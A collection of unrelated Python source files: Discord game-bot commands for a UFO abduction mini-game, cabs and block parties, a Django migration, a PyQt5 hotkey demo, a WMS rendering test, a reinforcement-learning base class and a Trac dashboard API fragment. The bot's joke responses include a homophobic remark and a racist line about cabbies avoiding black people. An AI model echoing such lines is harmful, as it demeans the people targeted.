if district_data.capturing_faction not in ["", district_data.controlling_faction] and district_data.controlling_faction != '':
response += "{} have been de-capturing this district. ".format(district_data.capturing_faction.capitalize())
elif district_data.controlling_faction == district_data.capturing_faction and district_data.controlling_faction != '':
response += "{} have been tightening control of this district. ".format(district_data.capturing_faction.capitalize())
elif district_data.controlling_faction != "":
response += "{} control this district. ".format(district_data.controlling_faction.capitalize())
elif district_data.capturing_faction != "":
response += "{} have been capturing this district. ".format(district_data.capturing_faction.capitalize())
else:
response += "Nobody has staked a claim to this district yet. "
if district_data.time_unlock > 0:
response += "\n\n**It's impossible to capture at the moment.**"
if not district_data.all_neighbors_friendly():
response += "But the lock is starting to decay..."
response += "Current progress: {progress}%".format(progress=percent_progress_after)
return await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
async def change_spray(cmd):
user_data = EwUser(member=cmd.message.author)
newspray = cmd.message.content[(len(ewcfg.cmd_changespray)):].strip()
if newspray == "":
response = "You need to add an image link to change your spray."
elif len(newspray) > 400:
response = "Fucking christ, are you painting the Sistine Chapel? Use a shorter link."
else:
response = "Got it. Spray set."
user_data.spray = newspray
user_data.persist()
return await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
async def tag(cmd):
user_data = EwUser(member=cmd.message.author)
if user_data.life_state in (ewcfg.life_state_enlisted, ewcfg.life_state_kingpin):
response = user_data.spray
else:
response = "Save the spraying for the gangsters. You're either too gay or dead to participate in this sort of thing."
return await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
async def ufo_observe(cmd):
user_data = EwUser(member = cmd.message.author)
cosmetics = bknd_item.inventory(id_user=user_data.id_user, id_server=cmd.guild.id, item_type_filter=ewcfg.it_cosmetic)
protected = False
for cosmetic in cosmetics:
cosmetic_data = EwItem(id_item=cosmetic.get('id_item'))
if cosmetic_data.item_props.get('id_cosmetic') == 'skinsuit':
if cosmetic_data.item_props.get('adorned') == 'true':
protected = True
shipstate = EwGamestate(id_state='shipstate', id_server=cmd.guild.id)
if user_data.poi != 'ufoufo':
return await ewdebug.scrutinize(cmd=cmd)
elif not protected:
response = "Those aliens would probably ass-probe the fuck out of you if you messed with their equipment. Better not."
elif shipstate.bit == 1:
response = "The ship is grounded. Can't see much from here."
elif cmd.tokens_count <= 1:
response = "Observe what?"
elif not ewcfg.dh_active or ewcfg.dh_stage != 300:
response = "Wait, your alien espionage is waaaay out of season."
else:
poi_seek = ewutils.flattenTokenListToString(cmd.tokens[1:])
poi_sought = poi_static.id_to_poi.get(poi_seek)
if poi_sought is None:
response = "The aliens know all the district names. You don't have to make up weird shit."
elif poi_sought.id_poi == 'ufoufo':
return await ewdebug.scrutinize(cmd=cmd)
elif poi_sought.is_street:
response = "You try to zoom in on a specific street, but you're a little too high up to get that level of detail."
elif poi_sought.id_poi == 'blackpond' or (not poi_sought.is_district and not poi_sought.is_outskirts and not poi_sought.is_pier and poi_sought.id_poi not in [ewcfg.poi_id_slimesendcliffs, ewcfg.poi_id_ferry, ewcfg.poi_id_sodafountain, ewcfg.poi_id_stockexchange, ewcfg.poi_id_ab_farms, ewcfg.poi_id_og_farms, ewcfg.poi_id_jr_farms]):
response = "The X-ray vision on this viewport sucks. You can't really see indoors."
elif poi_sought.id_poi in [ewcfg.poi_id_rowdyroughhouse, ewcfg.poi_id_copkilltown]:
response = "Do you want to blow your cover, dumbass? Stop acting like a gangster. The gang bases are mostly indoors anyway."
else:
new_permissions = {"ufo-ufo": ["read", "send", "connect"]}
new_permissions[poi_sought.channel] = ["read"]
current_poi = poi_static.id_to_poi.get('ufoufo')
response = ""
if current_poi is not None:
response = 'You point the observation reticle over at {}.'.format(poi_sought.str_name)
district_data = EwDistrict(id_server=cmd.guild.id, district='ufoufo')
poi_static.id_to_poi['ufoufo'].permissions = new_permissions
players_in_district = district_data.get_players_in_district(min_slimes=0, life_states=[ewcfg.life_state_enlisted, ewcfg.life_state_corpse, ewcfg.life_state_juvenile], ignore_offline=True)
server = ewcfg.server_list[cmd.guild.id]
for playerid in players_in_district:
member_object = await fe_utils.get_member(server, playerid)
await ewrolemgr.updateRoles(client=cmd.client, member=member_object)
return await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
async def launch(cmd):
user_data = EwUser(member=cmd.message.author)
protected = False
cosmetics = bknd_item.inventory(id_user=user_data.id_user, id_server=cmd.guild.id, item_type_filter=ewcfg.it_cosmetic)
for cosmetic in cosmetics:
cosmetic_data = EwItem(id_item=cosmetic.get('id_item'))
if cosmetic_data.item_props.get('id_cosmetic') == 'skinsuit':
if cosmetic_data.item_props.get('adorned') == 'true':
protected = True
if user_data.poi != 'ufoufo':
response = "Launch what, dumbass? My patience?"
elif not protected:
response = "The aliens aren't gonna let you start the ship. You're basically their captive now."
elif not ewcfg.dh_active or ewcfg.dh_stage != 300:
response = "Wait, your alien espionage is waaaay out of season."
else:
launchstate = EwGamestate(id_state='shipstate', id_server=cmd.guild.id)
if launchstate.bit == 1:
response = "PCHOOOOOOOOOO! Weird bleeps and bloops begin to increase in frequency as the ship rises back into the air!"
launchstate.bit = 0
launchstate.persist()
else:
response = "WHOOOOOOOO -CRASH! Your poor piloting crashes the ship back down. Your fellow alien crew seems excited, like you just chugged a whole bottle of their galactic lager or something. Good thing the hull is so shock resistant or you wouldn't be able to joyride again."
launchstate.bit = 1
launchstate.persist()
return await fe_utils.send_message(cmd.client, cmd.message.channel,fe_utils.formatMessage(cmd.message.author, response))
async def abduct(cmd):
user_data = EwUser(member=cmd.message.author)
item_sought = bknd_item.find_item(item_search='batterypack', id_user=cmd.message.author.id, id_server=cmd.guild.id)
protected = False
cosmetics = bknd_item.inventory(id_user=user_data.id_user, id_server=cmd.guild.id,
item_type_filter=ewcfg.it_cosmetic)
for cosmetic in cosmetics:
cosmetic_data = EwItem(id_item=cosmetic.get('id_item'))
if cosmetic_data.item_props.get('id_cosmetic') == 'skinsuit':
if cosmetic_data.item_props.get('adorned') == 'true':
protected = True
shipstate = EwGamestate(id_server=user_data.id_server, id_state='shipstate')
if user_data.poi != 'ufoufo':
response = "Abduct what, dumbass? My patience?"
elif not protected:
response = "The aliens aren't gonna let you start the ship. You're basically their captive now."
elif not ewcfg.dh_active or ewcfg.dh_stage != 30:
response = "Wait, your alien espionage is waaaay out of season."
elif cmd.mentions_count == 0:
response = "Abduct who?"
elif cmd.mentions_count > 1:
response = "One victim at a time, please."
elif shipstate.bit == 1:
response = 'The ship\'s on the ground right now, it can\'t reach you.'
else:
if item_sought:
target_data = EwUser(member = cmd.mentions[0])
target_poi = poi_static.id_to_poi.get(target_data.poi)
target_channel = fe_utils.get_channel(cmd.message.guild, target_poi.channel)
if target_poi.id_poi == 'blackpond' or (
not target_poi.is_district and not target_poi.is_outskirts and not target_poi.is_pier and target_poi.id_poi not in [
ewcfg.poi_id_slimesendcliffs, ewcfg.poi_id_ferry, ewcfg.poi_id_sodafountain,
ewcfg.poi_id_stockexchange, ewcfg.poi_id_ab_farms, ewcfg.poi_id_og_farms, ewcfg.poi_id_jr_farms]):
response = "The tractor beam on this ship sucks. You can't really see indoors."
return await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
elif target_poi.id_poi in [ewcfg.poi_id_rowdyroughhouse, ewcfg.poi_id_copkilltown]:
response = "Don't do that."
return await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
bknd_item.item_delete(id_item=item_sought.get('id_item'))
ewutils.moves_active[target_data.id_user] = 0
response = 'You plug in your battery pack and begin to abduct {} They\'re 20 seconds away.'.format(cmd.mentions[0].display_name)
await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
await fe_utils.send_message(cmd.client, target_channel, fe_utils.formatMessage(cmd.mentions[0], "You are being abducted by aliens. The ship is 20 seconds away."))
ewutils.active_restrictions[target_data.id_user] = 2
await asyncio.sleep(20)
ewutils.active_restrictions[target_data.id_user] = 0
ewutils.moves_active[cmd.message.author.id] = 0
target_data.poi = 'ufoufo'
user_data.persist()
target_data.persist()
await ewrolemgr.updateRoles(client=ewutils.get_client(), member=cmd.mentions[0])
await target_data.move_inhabitants(id_poi='ufoufo')
else:
response = "The going energy cost for abduction is pretty expensive these days. You better have a battery pack before you do something like that."
return await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
async def beam_me_up(cmd):
user_data = EwUser(member=cmd.message.author)
protected = False
cosmetics = bknd_item.inventory(id_user=user_data.id_user, id_server=cmd.guild.id,
item_type_filter=ewcfg.it_cosmetic)
for cosmetic in cosmetics:
cosmetic_data = EwItem(id_item=cosmetic.get('id_item'))
ewutils.logMsg(str(cosmetic_data.item_props))
if cosmetic_data.item_props.get('id_cosmetic') == 'skinsuit':
if cosmetic_data.item_props.get('adorned') == 'true':
protected = True
poi_sought = poi_static.id_to_poi.get(user_data.poi)
shipstate = EwGamestate(id_server=user_data.id_server, id_state='shipstate')
if not protected:
response = "Why would aliens abduct you? What makes you so special?"
elif poi_sought.id_poi == 'ufoufo':
response = 'You\'re already in here.'
elif poi_sought.id_poi != ewcfg.poi_id_west_outskirts:
response = "Hey, get a bit closer. The ship's in the West Outskirts. Beam up power doesn't grow on trees, you know."
elif shipstate.bit == 1:
response = 'The ship\'s on the ground right now, it can\'t beam shit.'
else:
await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, "You are being abducted by aliens. The ship is 20 seconds away."))
ewutils.active_restrictions[user_data.id_user] = 2
await asyncio.sleep(20)
ewutils.active_restrictions[user_data.id_user] = 0
ewutils.moves_active[cmd.message.author.id] = 0
user_data.poi = 'ufoufo'
user_data.persist()
await ewrolemgr.updateRoles(client=ewutils.get_client(), member=cmd.message.author)
await user_data.move_inhabitants(id_poi='ufoufo')
return await fe_utils.send_message(cmd.client, cmd.message.channel,fe_utils.formatMessage(cmd.message.author, response))
async def blockparty(cmd):
if not cmd.message.author.guild_permissions.administrator:
return
else:
blockstate = EwGamestate(id_server=cmd.guild.id, id_state='blockparty')
if cmd.tokens_count > 1:
if cmd.tokens[1] == 'slimegen':
blockstate.bit = 1
blockstate.persist()
response = "Slimegen turned on."
elif cmd.tokens[1] == 'close':
blockstate.bit = 0
blockstate.value = ''
blockstate.persist()
response = "OK, closing up."
else:
poi_sought = ewutils.flattenTokenListToString(cmd.tokens[1:])
poi = poi_static.id_to_poi.get(poi_sought)
if poi is not None:
time_end = int(time()) + (60 * 60 * 6) # 6 hours
blockstate.value = "{}{}".format(poi.id_poi, time_end)
blockstate.persist()
response = "Block party in {}! Everybody in!".format(poi.str_name)
else:
response = "Never heard of it."
else:
response = "I see you haven't gotten any smarter. Try !blockparty <setting>. Settings include 'close', 'slimegen', and any POI."
return await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
async def hailcab(cmd):
user_data = EwUser(member = cmd.message.author)
blockstate = EwGamestate(id_server=cmd.guild.id, id_state='blockparty')
poi = ''.join([i for i in blockstate.value if not i.isdigit()])
if poi == 'outsidethe':
poi = ewcfg.poi_id_711
if poi != user_data.poi:
response = "You can't hail a cab right now. All the cabbies are hiding for cover thanks to all the violence. Good job on that, by the way."
else:
if user_data.life_state in [ewcfg.life_state_enlisted, ewcfg.life_state_juvenile]:
if user_data.faction == ewcfg.faction_rowdys and user_data.life_state == ewcfg.life_state_enlisted:
dest = ewcfg.poi_id_rowdyroughhouse
elif user_data.faction == ewcfg.faction_killers and user_data.life_state == ewcfg.life_state_enlisted:
dest = ewcfg.poi_id_copkilltown
else:
dest = ewcfg.poi_id_juviesrow
await asyncio.sleep(5)
response = "**TAXI!** You shout into the crowd for a ride home. The drivers don't notice you're a miscreant, and pick you up without a second thought. They got nervous when you asked to return to your gang base, and forgot to ask for any fare. Nice!"
await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
ewutils.moves_active[cmd.message.author.id] = 0
user_data.poi = dest
user_data.persist()
await ewrolemgr.updateRoles(client=cmd.client, member=cmd.message.author)
return await user_data.move_inhabitants(id_poi=dest, visitor=user_data.id_user)
elif user_data.life_state == ewcfg.life_state_corpse:
response = "You're already dead. The cabbies unfortunately tend to avoid black people, so you should probably just float back to the sewers."
else:
response = "The cabbie looks confused. Why would a person like you need a cab?"
return await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2017-03-28 03:45
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('assetstracker', '0011_auto_20170326_2139'),
]
operations = [
migrations.RenameField(
model_name='assetissuancehistory',
old_name='issue_date',
new_name='issuedate',
),
migrations.RenameField(
model_name='assetissuancehistory',
old_name='issued_by',
new_name='issuedby',
),
migrations.RenameField(
model_name='assetissuancehistory',
old_name='return_date',
new_name='returndate',
),
]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Created on 2017年12月11日
@author: Irony."[讽刺]
@site: http://alyl.vip, http://orzorz.vip, https://coding.net/u/892768447, https://github.com/892768447
@email: 892768447@qq.com
@file: HotKey
@description:
'''
import ctypes # @UnusedImport
import ctypes.wintypes
from datetime import datetime
import sys
from PyQt5.QtWidgets import QWidget, QApplication, QVBoxLayout,\
QMessageBox, QTextBrowser, QPushButton
# 参考
# https://github.com/wujunwei/python-cookbook/blob/6e550d1a2b2b045cb07e56dd0198ccf01a2f3ea1/HotKey.py
# https://github.com/chenyijie4238215/notebook/blob/ba11fcc43cf8d623d1d1a722c261ddc20ad6b941/global_hotkey/GlobalHotKey.py
__Author__ = "By: Irony.\"[讽刺]\nQQ: 892768447\nEmail: 892768447@qq.com"
__Copyright__ = "Copyright (c) 2017 Irony.\"[讽刺]"
__Version__ = "Version 1.0"
WM_HOTKEY = 0x0312
MOD_ALT = 0x0001
MOD_NONE = 0x000
MOD_CONTROL = 0x0002
MOD_SHIFT = 0x0004
MOD_WIN = 0x0008
Modifier = {
"None": MOD_NONE,
"Ctrl": MOD_CONTROL,
"Alt": MOD_ALT,
"Shift": MOD_SHIFT,
"Win": MOD_WIN
}
class Window(QWidget):
KeyIds = {}
def __init__(self, *args, **kwargs):
super(Window, self).__init__(*args, **kwargs)
layout = QVBoxLayout(self)
self.logView = QTextBrowser(self)
self.logView.append("点击右上角关闭按钮会隐藏窗口,通过热键Alt+S来显示")
self.logView.append("等待热键中")
layout.addWidget(QPushButton("退出整个程序", self, clicked=self.onQuit))
layout.addWidget(self.logView)
def unregisterHotKey(self, kid):
ctypes.windll.user32.UnregisterHotKey(ctypes.c_int(self.winId()), kid)
def registerHotKey(self, kid, modifier, key):
key = str(key).upper()
_modifier = Modifier.get(modifier, None)
if not _modifier:
return QMessageBox.critical(self, "错误", "modifier key {0}未找到".format(modifier))
success = ctypes.windll.user32.RegisterHotKey(
ctypes.c_int(self.winId()), kid, _modifier, ord(key))
if success:
self.KeyIds[kid] = modifier + "+" + key
self.logView.append("热键:{0}+{1}注册{2}".format(modifier, key, "成功"))
else:
self.logView.append("热键:{0}+{1}注册{2}".format(modifier, key, "失败"))
def onQuit(self):
# 退出程序
for kid in self.KeyIds:
self.unregisterHotKey(kid)
QApplication.instance().quit()
def closeEvent(self, event):
# 忽略关闭窗口,直接隐藏
self.hide()
return event.ignore()
# 能监听热键,但是有个问题就是其它程序无法接受到事件
# 比如Ctrl+S,在记事本里随便输入内容按下Ctrl+S发现无法保存
def nativeEvent(self, eventType, message):
if eventType == "windows_generic_MSG" or eventType == "windows_dispatcher_MSG":
msg = ctypes.wintypes.MSG.from_address(message.__int__())
# 这段代码无法运行
# if ctypes.windll.user32.GetMessageA(ctypes.byref(msg), None, 0,
# 0) != 0:
if msg.message == WM_HOTKEY:
if msg.wParam == 1: # Alt+S
self.show()
self.logView.append("id:{0}, {1} at time:{2}".format(
msg.wParam, self.KeyIds.get(msg.wParam, None), datetime.now().strftime("%Y-%m-%d %H:%M:%S")))
return True, 0
return super(Window, self).nativeEvent(eventType, message)
if __name__ == "__main__":
app = QApplication(sys.argv)
w = Window()
w.show()
w.registerHotKey(1, "Alt", "S")
w.registerHotKey(2, "Ctrl", "S")
w.registerHotKey(3, "Shift", "S")
w.registerHotKey(4, "Win", "S")
w.registerHotKey(5, "Win", "Z")
sys.exit(app.exec_())
|
import os
from io import BytesIO
from adaguc.CGIRunner import CGIRunner
import unittest
import shutil
import sys
import subprocess
from lxml import etree
from lxml import objectify
import re
from adaguc.AdagucTestTools import AdagucTestTools
ADAGUC_PATH = os.environ["ADAGUC_PATH"]
class TestWMSPolylineLabel(unittest.TestCase):
testresultspath = "testresults/TestWMSPolylineLabel/"
expectedoutputsspath = "expectedoutputs/TestWMSPolylineLabel/"
env = {"ADAGUC_CONFIG": ADAGUC_PATH + "/data/config/adaguc.tests.dataset.xml"}
AdagucTestTools().mkdir_p(testresultspath)
def dotest(self, stylename):
AdagucTestTools().cleanTempDir()
config = (
ADAGUC_PATH
+ "/data/config/adaguc.tests.dataset.xml,"
+ ADAGUC_PATH
+ "/data/config/datasets/adaguc.testwmspolylinelabels.xml"
)
status, data, headers = AdagucTestTools().runADAGUCServer(
args=["--updatedb", "--config", config], env=self.env, isCGI=False
)
self.assertEqual(status, 0)
sys.stdout.write("\ntest style %s " % stylename)
sys.stdout.flush()
filename = "test_WMSPolylineLabel_" + stylename + ".png"
status, data, headers = AdagucTestTools().runADAGUCServer(
"DATASET=adaguc.testwmspolylinelabels&SERVICE=WMS&&SERVICE=WMS&VERSION=1.3.0&REQUEST=GetMap&LAYERS=areas&WIDTH=256&HEIGHT=256&CRS=EPSG%3A4326&BBOX=49,1.5,55,7.5&STYLES="
+ stylename
+ "%2Fpolyline&FORMAT=image/png&TRANSPARENT=TRUE&",
env=self.env,
)
AdagucTestTools().writetofile(self.testresultspath + filename, data.getvalue())
self.assertEqual(status, 0)
self.assertEqual(
data.getvalue(),
AdagucTestTools().readfromfile(self.expectedoutputsspath + filename),
)
def test_WMSPolyLineLabel_borderwidth_0_5px(self):
self.dotest("polyline_black_0.5px")
def test_WMSPolyLineLabel(self):
self.dotest("polyline_with_label")
def test_WMSPolyLineLabelOverlap2(self):
self.dotest("polyline_with_label_overlap")
def test_WMSPolyLineLabelAngle(self):
self.dotest("polyline_with_label_angle")
def test_WMSPolyLineLabelRoboto(self):
self.dotest("polyline_with_label_roboto")
def test_WMSPolyLineLabelColor(self):
self.dotest("polyline_with_label_color")
# GD font handling is apparantly very libgd version dependent
# GD tests switched off gor the moment
#
# def test_WMSPolyLineLabelRoboto_gd(self):
# self.dotest("polyline_with_label_roboto_gd")
# def test_WMSPolyLineLabel_gd(self):
# self.dotest("polyline_with_label_gd")
|
from abc import ABC, abstractmethod
import torch
import random
import math
# from torch_ac.format import default_preprocess_obss
# from torch_ac.utils import DictList, ParallelEnv
from ReplayMemory import ReplayMemory
from utils import default_preprocess_obss, DictList, ParallelEnv
import numpy as np
class BaseSRAlgo(ABC):
"""The base class for RL algorithms."""
def __init__(self, envs, model, target, device, num_frames_per_proc, discount, lr, gae_lambda,
max_grad_norm, recurrence, memory_cap, preprocess_obss, reshape_reward=None):
"""
Initializes a `BaseSRAlgo` instance.
Parameters:
----------
envs : list
a list of environments that will be run in parallel
acmodel : torch.Module
the model
num_frames_per_proc : int
the number of frames collected by every process for an update
discount : float
the discount for future rewards
lr : float
the learning rate for optimizers
gae_lambda : float
the lambda coefficient in the GAE formula
([Schulman et al., 2015](https://arxiv.org/abs/1506.02438))
entropy_coef : float
the weight of the entropy cost in the final objective
value_loss_coef : float
the weight of the value loss in the final objective
max_grad_norm : float
gradient will be clipped to be at most this value
recurrence : int
the number of steps the gradient is propagated back in time
preprocess_obss : function
a function that takes observations returned by the environment
and converts them into the format that the model can handle
reshape_reward : function
a function that shapes the reward, takes an
(observation, action, reward, done) tuple as an input
"""
# Store parameters
self.env = ParallelEnv(envs)
self.model = model
self.target = target
self.device = device
self.num_frames_per_proc = num_frames_per_proc
self.discount = discount
self.lr = lr
self.gae_lambda = gae_lambda
self.max_grad_norm = max_grad_norm
self.recurrence = recurrence
self.replay_memory = ReplayMemory(memory_cap)
use_cuda = torch.cuda.is_available()
self.FloatTensor = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor
self.total_updates = 0
self.preprocess_obss = preprocess_obss or default_preprocess_obss
self.reshape_reward = reshape_reward
self.continuous_action = model.continuous_action
# Control parameters
assert self.model.recurrent or self.recurrence == 1
assert self.num_frames_per_proc % self.recurrence == 0
# Configure acmodel
self.model.to(self.device)
self.model.train()
self.target.to(self.device)
self.target.train()
# Store helpers values
self.num_procs = len(envs)
self.num_frames = self.num_frames_per_proc * self.num_procs
# Initialize experience values
shape = (self.num_frames_per_proc, self.num_procs)
vec_shape = (self.num_frames_per_proc, self.num_procs, self.model.embedding_size)
self.obs = self.env.reset()
self.obss = [None]*(shape[0])
if self.model.recurrent:
self.memory = torch.zeros(shape[1], self.model.memory_size, device=self.device)
self.memories = torch.zeros(*shape, self.model.memory_size, device=self.device)
self.mask = torch.ones(shape[1], device=self.device)
self.masks = torch.zeros(*shape, device=self.device)
if self.continuous_action:
self.actions = torch.zeros(self.num_frames_per_proc, self.num_procs, self.model.n_actions, device=self.device)
else:
self.actions = torch.zeros(*shape, device=self.device, dtype=torch.int)
self.values = torch.zeros(*shape, device=self.device)
self.rewards = torch.zeros(*shape, device=self.device)
self.SR_advantages = torch.zeros(*vec_shape, device=self.device)
self.V_advantages = torch.zeros(*shape, device=self.device)
self.log_probs = torch.zeros(*shape, device=self.device)
self.embeddings = torch.zeros(*vec_shape, device=self.device)
self.successors = torch.zeros(*vec_shape, device=self.device)
self.target_values = torch.zeros(*shape, device=self.device)
self.target_embeddings = torch.zeros(*vec_shape, device=self.device)
self.target_successors = torch.zeros(*vec_shape, device=self.device)
# Initialize log values
self.log_episode_return = torch.zeros(self.num_procs, device=self.device)
self.log_episode_reshaped_return = torch.zeros(self.num_procs, device=self.device)
self.log_episode_num_frames = torch.zeros(self.num_procs, device=self.device)
self.log_done_counter = 0
self.log_return = [0] * self.num_procs
self.log_reshaped_return = [0] * self.num_procs
self.log_num_frames = [0] * self.num_procs
def collect_experiences(self):
"""Collects rollouts and computes advantages.
Runs several environments concurrently. The next actions are computed
in a batch mode for all environments at the same time. The rollouts
and advantages from all environments are concatenated together.
Returns
-------
exps : DictList
Contains actions, rewards, advantages etc as attributes.
Each attribute, e.g. `exps.reward` has a shape
(self.num_frames_per_proc * num_envs, ...). k-th block
of consecutive `self.num_frames_per_proc` frames contains
data obtained from the k-th environment. Be careful not to mix
data from different environments!
logs : dict
Useful stats about the training process, including the average
reward, policy loss, value loss, etc.
"""
for i in range(self.num_frames_per_proc):
# Do one agent-environment interaction
if self.continuous_action:
self.obs = [o for o in self.model.scaler.transform(self.obs)]
preprocessed_obs = self.preprocess_obss(self.obs, device=self.device)
with torch.no_grad():
if self.model.use_memory:
dist, value, embedding, _, successor, _, memory = self.model(preprocessed_obs, memory=self.memory * self.mask.unsqueeze(1))
_, target_value, target_embedding, _, target_successor, _, _ = self.target(preprocessed_obs, memory=self.memory * self.mask.unsqueeze(1))
else:
dist, value, embedding, _, successor, _, _ = self.model(preprocessed_obs)
_, target_value, target_embedding, _, target_successor, _, _ = self.target(preprocessed_obs)
if self.continuous_action:
action = dist.sample().detach()
action = torch.clamp(action, self.env.envs[0].min_action, self.env.envs[0].max_action)
torch.nan_to_num(action, nan=0.0, posinf=self.env.envs[0].max_action, neginf=self.env.envs[0].min_action)
else:
action = dist.sample().detach()
obs, reward, terminated, truncated, _ = self.env.step(action.cpu().numpy())
done = tuple(a | b for a, b in zip(terminated, truncated))
self.replay_memory.push((preprocessed_obs.image, preprocessed_obs.text,
self.FloatTensor([reward])))
# Update experiences values
self.obss[i] = self.obs
self.obs = obs
if self.model.use_memory:
self.memories[i] = self.memory
self.memory = memory
self.masks[i] = self.mask
self.mask = 1 - torch.tensor(done, device=self.device, dtype=torch.float)
self.actions[i] = action
self.values[i] = value
self.embeddings[i] = embedding
self.successors[i] = successor
self.target_values[i] = target_value
self.target_embeddings[i] = target_embedding
self.target_successors[i] = target_successor
if self.reshape_reward is not None:
self.rewards[i] = torch.tensor([
self.reshape_reward(obs_, action_, reward_, done_)
for obs_, action_, reward_, done_ in zip(obs, action, reward, done)
], device=self.device)
else:
self.rewards[i] = torch.tensor(reward, device=self.device)
self.log_probs[i] = dist.log_prob(action).squeeze()
##TODO:
#for continuous actions need to collect mean and var as well so that they can be used in ppo ratio
# Update log values
self.log_episode_return += torch.tensor(reward, device=self.device, dtype=torch.float)
self.log_episode_reshaped_return += self.rewards[i]
self.log_episode_num_frames += torch.ones(self.num_procs, device=self.device)
for i, done_ in enumerate(done):
if done_:
self.log_done_counter += 1
self.log_return.append(self.log_episode_return[i].item())
self.log_reshaped_return.append(self.log_episode_reshaped_return[i].item())
self.log_num_frames.append(self.log_episode_num_frames[i].item())
self.log_episode_return *= self.mask
self.log_episode_reshaped_return *= self.mask
self.log_episode_num_frames *= self.mask
# Add advantage and return to experiences
if self.continuous_action:
# asuming flat observations for continuous action case:
# this is true for the Mountain Cart example but may not be in general
# Ideally the continuous action code should be modifed to handle flat or image input
# And the use of a scaler should be an option to train.py
# And either use checks here to do the following
# or create a wrapper that does the scaling and set it up in train.py
self.obs = [o for o in self.model.scaler.transform(self.obs)]
preprocessed_obs = self.preprocess_obss(self.obs, device=self.device)
with torch.no_grad():
if self.model.use_memory:
_, next_value, _, _, next_successor, _, _ = self.target(preprocessed_obs, memory=self.memory * self.mask.unsqueeze(1)) #target
else:
_, next_value, _, _, next_successor, _, _ = self.target(preprocessed_obs)
for i in reversed(range(self.num_frames_per_proc)):
next_mask = self.masks[i+1] if i < self.num_frames_per_proc - 1 else self.mask
next_successor = self.target_successors[i+1] if i < self.num_frames_per_proc - 1 else next_successor
#next_value = self.target_values[i+1] if i < self.num_frames_per_proc - 1 else next_value
next_SR_advantage = self.SR_advantages[i+1] if i < self.num_frames_per_proc - 1 else 0
# next_V_advantage = self.V_advantages[i+1] if i < self.num_frames_per_proc - 1 else 0
SR_delta = self.target_embeddings[i] + (self.discount * next_successor * next_mask.reshape(-1,1)) - self.target_successors[i]
self.SR_advantages[i] = SR_delta + (self.discount * self.gae_lambda * next_SR_advantage * next_mask.reshape(-1,1))
# V_delta = self.rewards[i] + self.discount * next_value * next_mask - self.target_values[i]
# self.V_advantages[i] = V_delta + self.discount * self.gae_lambda * next_V_advantage * next_mask
# Define experiences:
# the whole experience is the concatenation of the experience
# of each process.
# In comments below:
# - T is self.num_frames_per_proc,
# - P is self.num_procs,
# - D is the dimensionality.
exps = DictList()
exps.obs = [self.obss[i][j]
for j in range(self.num_procs)
for i in range(self.num_frames_per_proc)]
if self.model.use_memory:
# T x P x D -> P x T x D -> (P * T) x D
exps.memory = self.memories.transpose(0, 1).reshape(-1, *self.memories.shape[2:])
# T x P -> P x T -> (P * T) x 1
exps.mask = self.masks.transpose(0, 1).reshape(-1).unsqueeze(1)
# for all tensors below, T x P -> P x T -> P * T
exps.action = self.actions.transpose(0, 1).reshape(-1)
exps.value = self.values.transpose(0, 1).reshape(-1)
exps.reward = self.rewards.transpose(0, 1).reshape(-1)
exps.SR_advantage = self.SR_advantages.transpose(0, 1).reshape(-1,self.model.embedding_size)
exps.successor = self.successors.transpose(0, 1).reshape(-1,self.model.embedding_size)
exps.successorn = exps.successor + exps.SR_advantage
#exps.V_advantage = self.V_advantages.transpose(0, 1).reshape(-1)
#exps.returnn = exps.value + exps.V_advantage
exps.log_prob = self.log_probs.transpose(0, 1).reshape(-1)
# Preprocess experiences
exps.obs = self.preprocess_obss(exps.obs, device=self.device)
# Log some values
keep = max(self.log_done_counter, self.num_procs)
logs = {
"return_per_episode": self.log_return[-keep:],
"reshaped_return_per_episode": self.log_reshaped_return[-keep:],
"num_frames_per_episode": self.log_num_frames[-keep:],
"num_frames": self.num_frames
}
self.log_done_counter = 0
self.log_return = self.log_return[-self.num_procs:]
self.log_reshaped_return = self.log_reshaped_return[-self.num_procs:]
self.log_num_frames = self.log_num_frames[-self.num_procs:]
return exps, logs
@abstractmethod
def update_parameters(self):
pass
|
# -*- coding: utf-8 -*-
#
# Web API module of Dashboard.
#
# (C) 2013 Internet Initiative Japan Inc.
# All rights reserved.
#
# Created on 2013/05/28
# @author: yosinobu@iij.ad.jp
try:
import json
except ImportError:
import simplejson as json
from trac.core import Component, implements, ExtensionPoint
from trac.web import IRequestHandler
from tracportal.api import IProjectListProvider
from tracportal.project_list.api import IProjectInfoProvider
__author__ = 'yosinobu@iij.ad.jp'
class DashboardAPIModule(Component):
implements(IRequestHandler)
project_list_providers = ExtensionPoint(IProjectListProvider)
project_info_providers = ExtensionPoint(IProjectInfoProvider)
# IRequestHandler methods
def match_request(self, req):
return req.path_info and req.path_info.startswith('/dashboard/api/projects')
def process_request(self, req):
req.perm.require('PORTAL_DASHBOARD_VIEW')
require_perms = ['XML_RPC']
if req.path_info.endswith('/report'):
require_perms.extend(['TICKET_VIEW', 'REPORT_VIEW'])
elif req.path_info.endswith('/roadmap'):
require_perms.extend(['TICKET_VIEW', 'ROADMAP_VIEW', 'MILESTONE_VIEW'])
elif req.path_info.endswith('/timeline'):
require_perms.extend(['TIMELINE_VIEW'])
projects = []
for provider in self.project_list_providers:
env_names = provider.get_env_name_list(require_perms, [req.authname])
if env_names:
for env_name in env_names:
for info_provider in self.project_info_providers:
info = info_provider.get_info(env_name)
if info:
